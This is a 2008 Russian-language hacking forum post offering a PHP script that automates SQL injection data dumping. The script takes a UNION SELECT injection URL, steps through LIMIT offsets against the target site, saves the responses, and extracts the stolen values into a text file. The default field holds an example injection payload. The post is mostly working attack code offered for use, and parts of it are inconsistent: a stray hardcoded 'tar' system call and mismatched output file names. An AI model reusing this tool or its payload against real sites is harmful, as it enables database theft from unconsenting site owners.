
21.08.2008, 15:47
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме: 2630617
Репутация:
245
|
|
Brut_or_grabber_limit
//////////////////////////////////////
// Brut_or_grabber_limit
// Coder By M!cr0b aka HakNet v1.0
// icq: 532-415
// Whack Team
// www.forum.whack.ru
//////////////////////////////////////
Brut_or_grabber_limit
Даной скрипт перебирает инэкцию через лимит и сохраняет в файл "save.txt.gz".
Вобше ищо есть несколько функций.. но для етого вам придеса самим заюзать скрипт...
Так как скрипт написаной мной, ридми по используванию есть на украинском, переводом страдать я нехочу так что юзайте http://pereklad.online.ua
Скачать скрипт с ридми: http://webfile.ru/2175298
или сам скрип:
PHP код:
<?
//////////////////////////////////////
// Coder By M!cr0b aka HakNet v1.0 //
// icq: 532-415 //
// Whack Team //
// forum.whack.ru //
//////////////////////////////////////
?>
<html>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<head><title></title>
<style>
body{
margin:200 150;
background: #666;
font: normal 13px Arial, Helvetica, sans-serif;
color: #666;
}
table,td{
border : 1px dashed #444444;
background-color : #F4F4F4;
font : 12px courier new;
color : #888888;
}
input,select{
background-color: #000000;
font:8pt verdana;
text-align:left;
color: #669666;
}
</style>
<body>
<table>
<tr>
<td>
<form method="post">
1. <a href="readme.txt">ReadMe</a><br>
2. Count: <input type="type" name="count" size="5"><input type='checkbox' onChange="if(this.checked){document.all.start.disabled=false;}else{document.all.start.disabled=true;}">yes<br>
3. Url: <input type="type" name="url" value="http://coder/mysqltools/testing_injection/index.php?i=-1+union+select+1,concat(0x2b7c,categor,0x7c2b),3,4+from+categors" size="135">
<select name="Z">
<option value="">null</option>
<option selected value="/*">/*</option>
<option value="--">--</option>
</select>
<center><input type="submit" name="start" disabled="disabled" value="Старт" style="cursor:pointer">
</form>
<br><br>
<form method="POST">
<input type="submit" name="musor" value="Очистка" style="cursor:pointer"></center>
</form>
</td>
</tr>
<tr>
<td>
<?php
system('tar -cvf save.txt.tar Z:\home\coder\www\mysqltools\Brut_or_grabber_limit');
if($_POST['start']){
$count=$_POST['count'];
$url=$_POST['url'];
$Z=$_POST['Z'];
$fp=gzopen("save.txt.tar", "w9");
for($i=0;$i<$count;$i++){ // скільіки разів повторювати цикл вибірки
$input=@file_get_contents("".$url."+LIMIT+".$i.",1".$Z."");
gzwrite ($fp, $input);
}
gzclose ($fp);
echo "<font color='#669666'><center>Для очищення спочтку розпакуйте файл <b>save.txt.gz</b></center></font>";
}
if($_POST['musor']){
$input=@file_get_contents("save.txt");
$oprede = "+|";
$oprede2 = "|+";
preg_match_all('|'.preg_quote($oprede, '/').'.*'.preg_quote($oprede2, '/').'|s',$input,$out);
$sd = explode($oprede2,$out[0][0]);
$cnt = count($sd);
$zapis=fopen("good.txt", "a+");
for ($i=0;$i<$cnt-1;$i++) {
preg_match_all('|'.preg_quote($oprede, '/').'.*|s',$sd[$i],$out1);
$str = str_replace($oprede,"",$out1[0][0]);
fwrite($zapis, $str."\n");
}
fclose ($zapis);
echo "<font color='#669666'><center>Очищено вдало. Перевірити: <a href='good.txt'><b>good.txt</b></a></center</font>";
}
?>
</body>
</td>
</tr>
</table>
Последний раз редактировалось Micr0b; 21.08.2008 в 15:55..
|
|
|